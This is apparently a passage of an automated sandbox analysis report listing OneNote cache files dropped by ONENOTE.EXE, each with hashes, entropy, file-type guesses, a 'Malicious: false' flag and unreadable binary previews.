Preview:	2...>...................................................................................................................................................................................................h.......h..^&h.@.T3.f.d^sl.....^sl=.A...`.5.Qh..^&h.@.T3.f.dh...^sl=.A...`.5.Q^sl..............................h.......h...................................................h....!..h..\....h..N....................................................^sl..c..,.........................4..1...(...(... ...D.o.c.u.m.e.n.t. .T.h.e.m.e.s..........h....1... ..$ ...D.o.c.u.m.e.n.t. .T.h.e.m.e.s...............ywt..C.$.>......N...^.............................................................................................................ywt..C.$.>..............................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000003L.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	0.48302807621974864
Encrypted:	false
SSDEEP:	6:NTcUvK/RTrUtuXlKatyLx8Olu3afu0sbwxcw1EXdsbw/K:VcUvEnNnV38u9wqQEXew/K
MD5:	C087F9660B3494B0CDCCD623FD69944C
SHA1:	6B6CB8A533C095566ADD18441CE1214B1D01837F
SHA-256:	D1E388C48230D0692E1ACEC05A59575C2A744539F58584A6828E02565A4058D7
SHA-512:	837547EBF1EB332130387AB7F7053973436EAD66F5807125B8EA63B459BE8652727B6A6A543E6A065C944A3A1F6F8A6C88F19DA45FB42A48DB6D6077501F57F6
Malicious:	false
Preview:	2...>...........~........................................................................................................................................................................................l.......l.<v.B..hW..v.........................l.<v.B..hW..v.l....................................................l.......l...................................................l.......l.\..............................................................4..1...(...(.......1.0.3.3.........1.......1.0.3.3....,....O....y.......N...^............................................................................................................,....O....y...............................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000003M.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	0.7314034245123762
Encrypted:	false
SSDEEP:	12:KUC7xUNxUVxS+eIWO7eIWc1hYFQEgY+K:KUSIUxS+v7MF7+
MD5:	9BC346BD7D6D3C54FAC9E9C24181852A
SHA1:	19B4D27D946A9A77B38FCCCC25DEBFBF6E048515
SHA-256:	8D126E75CC424FA22B3F38FAC74A705D721A5C9B4FB81C3A15EE4C6429CE3F9A
SHA-512:	0B41B95EFE3288FB947359D750CB378A29AE4E0753E3B149379F8ADE6C1A98B4E27DF096404C0EEC9EE2ACCA0C6BEF41FCC3AF69A400739DFBA922AC0E3BD861
Malicious:	false
Preview:	2...>...................................................................................................................................................................................................../......./..u.O./.i..-K..........+.A..6G..t...+.A..6G..t...../..u.O./.i..-K../................................/......./.................................................../.."..../\....../N........................................................c..,.........................4..1...(...(...$...S.m.a.r.t.A.r.t. .G.r.a.p.h.i.c.s................/..1... ..$$...S.m.a.r.t.A.r.t. .G.r.a.p.h.i.c.s.........+Q.]..D..f.5.d.....N...^...........................................................................................................+Q.]..D..f.5.d.....................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000003N.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	0.48099448391682853
Encrypted:	false
SSDEEP:	6:NTcXllmoOLoOft0iYG0S+tlyLx8Olu3af71sDZcw1EIksDXK:VcvmZb0iIS+XV38SDZcQEIbDa
MD5:	C492BB3DBDB1F9A0800707B004F011DE
SHA1:	0A62ED426F48F15E97ACF982C13AB43D50D774D6
SHA-256:	4420B6201BC536CA8A9FB1C63DBB6D5357B273BBED60348B12C8E18E027E9942
SHA-512:	7DFA29B02698ADDE95BCA14A5E76DB52EB371C3276574ADC677C7889FE05367B0DEDA3CFA78A6B968778600B687C3486934A53CC12F799A9F34A5D619E9FE03E
Malicious:	false
Preview:	2...>...........~.......................................................................................................................................................................................^Gm.....^GmE?..A.&.~O...........................^GmE?..A.&.~O...^Gm..................................................^Gm.....^Gm.................................................^Gm.....^Gm\..............................................................4..1...(...(.......1.0.3.3.........1.......1.0.3.3....Q....1N.&.u..=.....N...^............................................................................................................Q....1N.&.u..=.............................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000003O.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	0.6490204902933241
Encrypted:	false
SSDEEP:	6:UWBETlkDqZ2hnlmrl+RLx88cbrMkq2Sz1MQQcbrMkq2Sz1pRcw1EaBfK:UeETlcqZMcrYNnkNYKQQnkNYCQEiK
MD5:	F43861A88B500AF58DE1BF7BA3EFB1EF
SHA1:	DA20FAA79258E1BE5C2FBD3F76A14DB91752623B
SHA-256:	DB6E498E342CA365D4159DD8B36772E4AF831B845DE43D2173BD9F90CC132214
SHA-512:	B75180A8029793AB0C6CDEFEF18D17DEDA391D990D471F975E89E3A6E08CE9871A3A9AA1AF404EB964897F819C74B899D51C8FDDFD3B0A8CAF59F2A134A78747
Malicious:	false
Preview:	2...>....................................................................................................................................................................................................=.......=.Y.S.O....1e+.........................=.Y.S.O....1e+.=....................................................=.......=...................................................=..."...=.\..............................................................4..1...(...(...D...W.o.r.d. .D.o.c.u.m.e.n.t. .B.i.b.l.i.o.g.r.a.p.h.y. .S.t.y.l.e.s...............1...D...W.o.r.d. .D.o.c.u.m.e.n.t. .B.i.b.l.i.o.g.r.a.p.h.y. .S.t.y.l.e.s...........ML.EfJ.I4...Q`....N...^.............................................................................................................ML.EfJ.I4...Q`............................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000003P.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	0.7739283676570299
Encrypted:	false
SSDEEP:	12:+wfE0ElDtDtaIRjf/sD4vDwsD4CCQEe9K:+8EdFkIZf/nvDwndy
MD5:	5EC50F9302F97EA78B227E3B915D2A1E
SHA1:	F7703DFA9A97229B29BD797A8F34A1DCAD70706C
SHA-256:	7BE2FCBC6E5D72A543B78EDFF0AB8038201C4D09402256734B9B44FE9ED0C5DD
SHA-512:	A805E150D2E5EF5C3CFCE0913C5A6BD761C069EDBEB044BE187CBE7A50DADAD571E7E80A4AEBEA98386602942939DB85D6D7FDE0DC96D629DE12E0CCD0470601
Malicious:	false
Preview:	2...>................................................................................................................................................................................................................W.O..#kK...P.......P.....D.+78.&h{P.....D.+78.&h{P........W.O..#kK....................................................................................................#.....\.......N....................................................P....c..,.........................4..1...(...(...<...W.o.r.d. .D.o.c.u.m.e.n.t. .B.u.i.l.d.i.n.g. .B.l.o.c.k.s...................1... ..$<...W.o.r.d. .D.o.c.u.m.e.n.t. .B.u.i.l.d.i.n.g. .B.l.o.c.k.s..........kl...BI.#.h...J....N...^............................................................................................................kl...BI.#.h...J....................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000003Q.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	0.4834454360694914
Encrypted:	false
SSDEEP:	6:NTcI9+5Emx1kYmliUeyLx8Olu3afevw1EA:VcI9GKeV384QEA
MD5:	3ABEC4A97B3B1D49E53694A1F2F1A5BA
SHA1:	6920B89A6A52D040555ACA04436723B150BDC033
SHA-256:	42CE1E48C420D010DA50208890F6BF1F955EF258782805F8151E986B14F84EC6
SHA-512:	75D3BE5B755E1DF95DF64EE4ECE1EFFFCD5AD9F316532D5D7BF0C1F4F01B686F32A1050798C75E087F2B29661A16F3A1001AF2ECAFB23FF28E4CA2A22CF0A8F0
Malicious:	false
Preview:	2...>...........~.......................................................................................................................................................................................rA......rA..JlHL.`%W...E........................rA..JlHL.`%W...ErA...................................................rA......rA..................................................rA......rA.\..............................................................4..1...(...(.......1.0.3.3.........1.......1.0.3.3.....t..M......F.....N...^.............................................................................................................t..M......F.............................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000003R.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	1.0033182200385906
Encrypted:	false
SSDEEP:	12:DKtdjn3mk7kswWXDwVuk1+CkHc1C9kLNJ0oXYQEbX1K:DGRXgVuDc12kLN+YYX1
MD5:	23EBB86BD1C98C6E1733263AECF26175
SHA1:	4BD01AAD4CC70EB49F63D1A9393CBFE4F9ACE7CD
SHA-256:	ED71A17C218AE94118B1454C3A032EE7DE60328939401AEED6E4EF972680D92A
SHA-512:	C8AE1E2DE747BBD978AB9E44F0731C63F69DC2053B6D90940EEB0E6F2EEB9971A6BDA9778619A76DBA1936D6E93EEE420A02031BDCB22456F91FEBDD7BB51C4C
Malicious:	false
Preview:	....>..........................?......?.................................................................................................................................................................Q......Q...YEL.Qdr.f.9'.......'.../.F...H..@.<...#!.A..7....z<...'.../.F...H..@.'...Q...YEL.Qdr.f.9Q...........Q......Q..................................................Q...-..Q.\....'..N.(....................................................4..1...(...(.......L.i.v.e.C.o.n.t.e.n.t..................'.... ..$..........'.......'...*/.F...H..@.<.......<...#!.A..7....z2...............................Q.......................................<....c..,...................'.... ..$p............,Q..R.N...a.\|............'.... ..$p...........NHu...EH.N.../4........?s...cF.:R........N...^............................................................................................................?s...cF.:R........................................................................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000003S.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	OpenPGP Secret Key
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	0.9812483253557147
Encrypted:	false
SSDEEP:	12:BKKe+lPygELZjtaSg/rm1QHMUCaOYyqMQEwqQ:gZjta1/3CaOYyqMMq
MD5:	811B1BBA298AB444DCC75B7CA45BB626
SHA1:	506B1AA0C0921113DE5BA03A677077B00EF7B534
SHA-256:	D4A1A3311E38EB659A2DB0AF8CD9A2F60E3B093F4C0F13438E86A57B2C0B79DE
SHA-512:	E8A979CC4797EF4362123B9D55048541ACC4A51A49950C97CF25CBAD5F15D36A7140461F33F67EF771C1B9834B1F74435544C1AE48481ACCE32536FFD9B5508C
Malicious:	false
Preview:	....>.............................?...?.................................................................................................................................................................P ......P ....ZO.m........9.......9.z..@.s$O.....9.z..@.s$O.....9...\|.B).I........\|.P ....ZO.m......P .............9.......9...................................................9..,....9\......9N......9N.)............................................4..1...(...(.......1.6........................P ...c..,.....................9.. ..$............9.......9.z..@.s$O.....\|.......\|.B).I......2...............................P .........................................\|..c..,.....................9...9.. ..$.............9...9.. ..$p............+,.J.H.ipH.?7L..........-...:.H.ie.p.......N...^...........................................................................................................-...:.H.ie.p.......................................................................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000003T.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	big endian ispell hash file (?), 8-bit, no capitalization, 26 flags
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	1.5788405894220894
Encrypted:	false
SSDEEP:	24:4DVrta78VwfvwatA0D7aqCrdiDaIXmJwaK:ea78Gvwa7D7aPJiahJ3
MD5:	6601F97B275E4B79232FCA16CAB45601
SHA1:	607339C3A5BA400869CF90C2F1AA292FA041F0CC
SHA-256:	70D445793178CF5A45FC48C015F4B53A688BF768AAF331AAB1868860BAA94D71
SHA-512:	0EE6722B7E9B54A357FAC65EA5041DA48144D8AB2A8878F635DCBC3D8098B6F80F63C96053720FBD6F5B48FBFF7C12B0BFBAA85EFAB06A86A27A26B030E5E3CB
Malicious:	false
Preview:	........0...............................................................................................................................................................................................,.......,..:.l.N.?Y..M. ....... .....?G....$.}. .....?G....$.}$ ....1..a.G...C.....1..,..:.l.N.?Y..M.,............,.......,...................................................,....C..,..\....,..N....,..N.)..,..N.8..,..N.?............................4..1...(...(.......M.a.n.a.g.e.d...................... ....c..,...................,.... ..$...........l@......l@...gM.,...\|.. ....... .....?G....$.}.2...............................,....l@..1................................l@..c..,...................,...,.... ..$.......1.......1..a.G...C.... ....... .....?G....$.}..l@...gM.,...\|...l@.,..:.l.N.?Y..M.,...A .....N.r..ln.A ......>................1..a.G...C..............................................1...c..,...................,...,...,.... ..$.......... ....... .....?G....$.}$A ......A .....N

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000003U.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	0.7675686799614715
Encrypted:	false
SSDEEP:	12:bEutniExNvEYT3YXOk8A1kLBJyYQEY1K:NiYC/+kALLd
MD5:	C519305A7352C1DC9C7D8C1ECA6513DD
SHA1:	13260499EB9451440EF53D2F5E8C82DB78383FA3
SHA-256:	36500777ADC7217DE4736AD8D9089AF09E179D8BDDD6B19644EAD524F797752E
SHA-512:	4632A93947AA0E8872E2B56044C45ADE8A883C14B996D795CA3029E9DC17D3821A4FCEC7AD89A5E79CE74142EB9EA08CDD2E337A1D82F4E731BEB49E638117C7
Malicious:	false
Preview:	2...>..............................................................................................................................................................................................................f,.aG.8-=#'...PO......PO.t .M...%\|D....f,.aG.8-=#'.......PO.t .M...%\|D..PO...............................PO......PO..................................................PO..#...PO\.....PON. ....................................................4..1...(...(... ...D.o.c.u.m.e.n.t. .T.h.e.m.e.s...........................c..,....................PO.. ..$................PO.. ..$p............)6V_^SC....(B.V........"...H..vf..'`....N...^............................................................................................................."...H..vf..'`............................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000003V.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	0.5251998742119102
Encrypted:	false
SSDEEP:	6:jhzcbp10M/kDDQ3lmDChl7/yLx8Olu3S0t0cA8w1E3JcAA:jRc910ekDDicWz7/V3nlrQECn
MD5:	2B8FDF88B9CEF6BF0D87F8A9CED5D5B5
SHA1:	C19D213F48B8DF4FB6C3724302AE84A0A648BB86
SHA-256:	4434AE3C3BFF89FF05B99CF46F734C6B3BDD205CF9888B2F32DD27ED3CC03F75
SHA-512:	CB04974510D2640BBB2452724279D3C802FE66A61F6F515D031739520327DC8AE320374906E96EC073A76CADC2D35DA3F6B49F9AACA3F73DDCBA7D2CDB26FF05
Malicious:	false
Preview:	2...>...................................................................................................................................................................................................&u......&u..~..M...oa.6.........................&u..~..M...oa.6.&u...................................................&u......&u..................................................&u......&u.\..............................................................4..1...(...(.......1.0.3.3.................p........k..._.K.J.....t..........W.....L.B..... ....N...^...........................................................................................................W.....L.B..... ....................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000040.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	0.7675394975599898
Encrypted:	false
SSDEEP:	12:D0CnhWXE2WXl/1c6DseIWym01zfHNGPQEeD:QeOEHl/1c6ATmu/N6
MD5:	29F5F51DDA3F22054F1F8904F48CB4A8
SHA1:	B352A541B260621C3FCBF3386392B55BE64333D0
SHA-256:	E3B73E53BDBD1AFA322F2847C707D7AC4958C63F3431C8E55559FC19E6ECC27E
SHA-512:	AED7C1D286B7543BF9EF91104CC8DE2B08BE609CF4F51EC6AC4123B97700D38989E7A273F636475E36DF82D2B792EE2DEE620A994944FD6392AFCD4E93F0FBD4
Malicious:	false
Preview:	2...>.....................................................................................................................................................................................................F.......F...dK..-.....\n......\n...K..e.r...F...dK..-......F..\n...K..e.r.\n................................F.......F...................................................F..$....F\......FN. ....................................................4..1...(...(...$...S.m.a.r.t.A.r.t. .G.r.a.p.h.i.c.s...........................\n..c..,.....................F.. ..$.................F.. ..$p...........K.5....L.V)...oA........t..XC..T..O.~....N...^.............................................................................................................t..XC..T..O.~....................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000041.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	0.5252522261956215
Encrypted:	false
SSDEEP:	6:jhzc0x/Jpa/QedRyLx8Olu3ix6xcw1EQMx6/K:jRcGJpcV3ix6qQE1x6/K
MD5:	37D5356F4C3BE43DDBF6EC501AB4369E
SHA1:	DA4FDE760DEF483A080273C0DA528C6AC4E128D6
SHA-256:	3D4AF3563F08A425C6D5AC87FB8FFEA4CD87AC9BB40E58BDDDD1B030682BF248
SHA-512:	02FB6F28AD315712EF2E448E07160CBF316A704B91B8161F37CC30B556802930369A368985F44FE30E2F97BA4299BDEEF1DD3EB80D7DBF159E58944BF6B52AB6
Malicious:	false
Preview:	2...>...............................................................................................................................................................................................................$f-J.,.nF.W.............................$f-J.,.nF.W............................................................................................................................\..............................................................4..1...(...(.......1.0.3.3.................p...........-.K...a.X.+.........."..!...C.D.5........N...^..........................................................................................................."..!...C.D.5........................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000042.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	0.6127752188576095
Encrypted:	false
SSDEEP:	6:90C8Le6vmtVOHu6Lx88cbrMkq2Sz1ss9fFVkSY1S8Ot+cw1EfOtMK:eCgs1MnkNYqs9f8TST+cQEqH
MD5:	F1FEECE08ACA75F376BFC194F31E88FC
SHA1:	F36ADCD2D5B1BD1ABECF705C85EA8B5A0567CE87
SHA-256:	D1C4DED5FCB5FA83C75E356500601CBC607E91FBD804F49989693442F143CB3E
SHA-512:	F0A024904C7ED32685BB40516EA9D69A099193522131D5963D1C3B71F880F442175C9DD6D327F4D81CD10831DB801C77D5B7199E3FE722313D86804F8FCDB470
Malicious:	false
Preview:	2...>....................................................................................................................................................................................................{.......{..;I.K....62h.........................{..;I.K....62h.{....................................................{.......{...................................................{..."...{.\..............................................................4..1...(...(...D...W.o.r.d. .D.o.c.u.m.e.n.t. .B.i.b.l.i.o.g.r.a.p.h.y. .S.t.y.l.e.s.......................p.........jX..0A...V;(...........\....2mF.B()VH!.....N...^...........................................................................................................\....2mF.B()VH!.....................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000043.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	0.7870023800544366
Encrypted:	false
SSDEEP:	6:1+E0/Osv+oU3sGoM4i/ogXp3a/I7Lx80cHnD2nHlXllk//zM1vRlC/qmw1EHk0:EEEOsY3sGf/bDvsD49kHQ1bxmQEH
MD5:	1151B1E1C9F084280576A0FB316F6983
SHA1:	B395AAF9B023402EB5009473546DC42FB6805480
SHA-256:	92D809A12F88B50B9BBFD6AEBFF5E0769EECC5D3ACE2EB90FAFDE70DC1505B76
SHA-512:	712B4FBA3D277FFD831E0ADA216722091158B951A68E6EC9C3177DEF601B3AA46F915ED44D7AC0D025206F63F8C23FE25F0CCB79C36C21D15D8C540C82D6599A
Malicious:	false
Preview:	2...>...................................................................................................................................................................................................d,......d,...m.E.....:..4.[.....4.[.\.FG......`.d,...m.E.....:..d,..4.[.\.FG......`.4.[..............................4.[.....4.[.................................................4.[..%..4.[\....4.[N."....................................................4..1...(...(...<...W.o.r.d. .D.o.c.u.m.e.n.t. .B.u.i.l.d.i.n.g. .B.l.o.c.k.s..........................d,...c..,...................4.[.. ..$...............4.[.. ..$p............J.....E.....u........a9..`..L.s..U%......N...^...........................................................................................................a9..`..L.s..U%..............................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000044.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	0.5227438662478051
Encrypted:	false
SSDEEP:	6:jhzcW/fHuWKtyLx8Olu35JKye0NPQllqw1ESPQllS:jRcG2TV35JS0pQEw
MD5:	B58426B6F7A513C9B5A30232348FC46C
SHA1:	130F73480BB362AAEFA5E2A6AB36081152732D4B
SHA-256:	FB05D81CE5A11211E472B49AC93D9F9D3408DD9AB107BE639A73442AA222C775
SHA-512:	35BB856E6A8A494DC6E82C1C90762501B1E3C88E0007CFDCBE3430108CA5E543B988D790CFF223D17FAB84870A5A6C2ED4315CA8720E5FBE06DA4730837805FB
Malicious:	false
Preview:	2...>...................................................................................................................................................................................................\R......\R.+.uD....(..........................\R.+.uD....(..\R...................................................\R......\R..................................................\R......\R.\..............................................................4..1...(...(.......1.0.3.3.................p.......p.... .H..wy...............4..].^C....~x.7....N...^............................................................................................................4..].^C....~x.7....................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000045.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	OpenPGP Secret Key
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	1.4398715326060474
Encrypted:	false
SSDEEP:	12:B9UiKfFo7dAXH3ktDLdckcmFFk1p66lkQ+4xWpNKPiVC5O/C9JBFwjnQE+M:ifFuuXUdykLkdxWp0PiQzzanS
MD5:	2EE819D0E14D22E8233DCCB60A8C887E
SHA1:	046A4179258121761C0191BD5C8BE4398A21C8D8
SHA-256:	A40F56A035830E219BDFF44C73F1211FF1D7ABE8ED2E63F6DE2F8B216A77D8C5
SHA-512:	71469665FE0E771D26D4B4D749636DD764924F662FC129E38CBF8B0E6579CB6E09066CFB63315D9901EAD6C4146D8A53BAB732891752EF9092088E3131E4AD64
Malicious:	false
Preview:	........".........................?......................................................................................................................................................................T.......T..+.kJ...@N.Fg..3.......3...@......:..3...@......:..3.q=...$A.7.\'%..q=...<....WG..f.....<............<.......<...................................................<...?...<.\.....<.N.....<.N.)...<.N.4...<.N.;............................4..1...(...(.......U.s.e.r......................3..c..,....................<... ..$..........I.......I..8..I.i.......<.......<....WG..f....2.................................3.I....................................I....c..,....................<...<... ..$......I..8..I.i......I....T..+.kJ...@N.Fg.T..........................>................<....WG..f..............................................T...c..,....................<...<...<... ..$...........<.......<....WG..f....q=......q=...$A.7.\'%...........q=...c..,....................<...<...<.

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000046.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	0.7612130456313341
Encrypted:	false
SSDEEP:	12:bEiUsHfTnHICO/SMJkFm/7YXso561FD3uulqQE0lS:lxO8WU9mD3Blq4l
MD5:	9A3C9C2F40E1B4791DE6C4D0AEA94434
SHA1:	02D396431F9EDE7E64863B62A0526317D3BB19F1
SHA-256:	C11A106D3622508A86A2708C0F73B443E0C453FF50163787A8F648A6C435FAC6
SHA-512:	B7C5A00B43AD420285BD43F11AE9A1F299A4DA40A27E90D339BDC873997AC05A5EBC57B9C4B6348504C06025F43BB3FC3B33E53604BE50FDF1FB0422A5FB8EAA
Malicious:	false
Preview:	2...>...................................................................................................................................................................................................f.f.....f.f.}..J.P..io.i...........yn..O..=b.U..f.f.}..J.P..io.if.f....yn..O..=b.U....................................................................................................#.....\.......N. ....................................................4..1...(...(... ...D.o.c.u.m.e.n.t. .T.h.e.m.e.s......................f.f..c..,........................ ..$.................... ..$p............I.s.0VH.Q...R...........tJJ.....S......N...^................................................................................................................tJJ.....S..............................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000047.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	0.525239104172914
Encrypted:	false
SSDEEP:	6:jhzcK+1uFAFOIBSQtyLx8Olu3FoCm//ww1EY//M:jRcsIBDV3FomQEx
MD5:	2FC7AA8E6872FCA4A765DD16576CF8FA
SHA1:	6A038926A1DFF5A6446F8F56E924222720E010E8
SHA-256:	BA5DE075716D5ECC524FE08C0F595086E9D9F28F402A8130272E3207B6E1D3EE
SHA-512:	E04715BE038C7D8B10F519D0C25CF8CFC809E1E635F08DFA73FFAF34DB162B2190E8510E5D6CDD7DFE306A8186944D614F7E84D7E36FDEC4FD5F6FC861C6CCC2
Malicious:	false
Preview:	2...>.................................................................................................................................................................................................... ....... .5..M... ............................. .5..M... ..... .................................................... ....... ................................................... ....... .\..............................................................4..1...(...(.......1.0.3.3.................p..........K...E.n.-.wn..............m.NeJ.] .h{......N...^..............................................................................................................m.NeJ.] .h{......................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000048.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	0.7710388671251535
Encrypted:	false
SSDEEP:	6:D0CoktQeVbSl/cRARxFmtXlrLx8felBkls0Clg2/619RlTfC0CBw1E70Cx:D0CTFSaKbw9lrseIWu2C19D7aQER
MD5:	290CCE3107E04F9F9AAF5B51C5E05D23
SHA1:	3C0B4D484988F435B6DA1EA1FCEE8A3A79015CDA
SHA-256:	49C5BFE32059BE6E5F0795DCB62C006B809C03734466A281AE96185235256511
SHA-512:	9AA91762DE8862CC6CA401DD5585BCEB9C3C843DB0C8F8B0FF4BCC6AF1BBCF8739F88356414A2374108EACD8EFDAE408C9B4601B9367298757272E5BDCC64A4B
Malicious:	false
Preview:	2...>...................................................................................................................................................................................................uP`.....uP`3..YG.fQ..))..........Tj.GC...&....Tj.GC...&.....uP`3..YG.fQ..)).uP`............................................................................................$....\......N. ....................................................4..1...(...(...$...S.m.a.r.t.A.r.t. .G.r.a.p.h.i.c.s..........................uP`..c..,....................... ..$................... ..$p...........[SMR.5.D....V.........1.\...M...9..9.....N...^............................................................................................................1.\...M...9..9.....................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000049.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	0.5217077581165882
Encrypted:	false
SSDEEP:	6:jhzcMgnYf/TLYYltl4l8q4qlyLx8Olu3Y3FMcxcw1Ek/K:jRcXYDUYHoV3Y3FXqQEk/K
MD5:	B9D62E00F18573D9519C845BEDCE18F0
SHA1:	06F16D802D40468FCB2F5A8D08EA779834857E3B
SHA-256:	D16ABFEED23EBB711C1E3B9F67AC1A92658076EDE1EF84E84A71BC4730FBFA27
SHA-512:	6A4C909F0B63430A46ADD4EAC1DEE26914A72AA2129D6CF42676E0F0A866DAC940FF1E06CAE2950341AF46E4F6147EB8F248CC77CD48D2C6BD8B4B75DCACE7CC
Malicious:	false
Preview:	2...>....................................................................................................................................................................................................m.......m.C...C.(.n...........................m.C...C.(.n...m....................................................m.......m...................................................m.......m.\..............................................................4..1...(...(.......1.0.3.3.................p.......Fh..(..G.:y...n...........'.koN.:K..F...T....N...^...........................................................................................................'.koN.:K..F...T....................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000004A.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	0.6118632712273583
Encrypted:	false
SSDEEP:	6:90CXetrzxKPll44tsLx88cbrMkq2Sz1sJKIt7XIlHYHw1E4lHYL:eCahKdS4tqnkNYqJDIhYHQE4hYL
MD5:	D69B671D3ACF8F5FCD0E7BEC33CB349F
SHA1:	558C3C38C542E27627E1FBE2F59600D49BD2B9DF
SHA-256:	5DE1F62D51C2EDE33A181F56E30FFF34DF48B14569D34AB557A266B2A8B6B3F8
SHA-512:	68D5D91739C35FF404D8DDD9DA2F093C41CF2EC1F90396BC63A9112EB391F573887C6E679C3BE24731C2C690BFAA4B4F5299047E9B7C542C7C8B3F10FCA401E4
Malicious:	false
Preview:	2...>.....................................................................................................................................................................................................p.......p....H..."c/............................p....H..."c/....p....................................................p.......p...................................................p.."....p\..............................................................4..1...(...(...D...W.o.r.d. .D.o.c.u.m.e.n.t. .B.i.b.l.i.o.g.r.a.p.h.y. .S.t.y.l.e.s.......................p.......c>.(..@..xK.i.............D.c...B....>\.....N...^............................................................................................................D.c...B....>\.....................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000004B.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	0.8075556075181776
Encrypted:	false
SSDEEP:	12:EER8z2ybrtvsD41MmsM1Zm/uHqQEuHl0:azbrJn1nsX//w
MD5:	9508BFDEBADDF6E96176CDDA94D4EB66
SHA1:	8FE8A8B4AD4C1F570080DA0203A67BBC322243E5
SHA-256:	A508B10D987326FDF5703175BEB02A80A067F60BE099E1F8BD27809BAC3DF99A
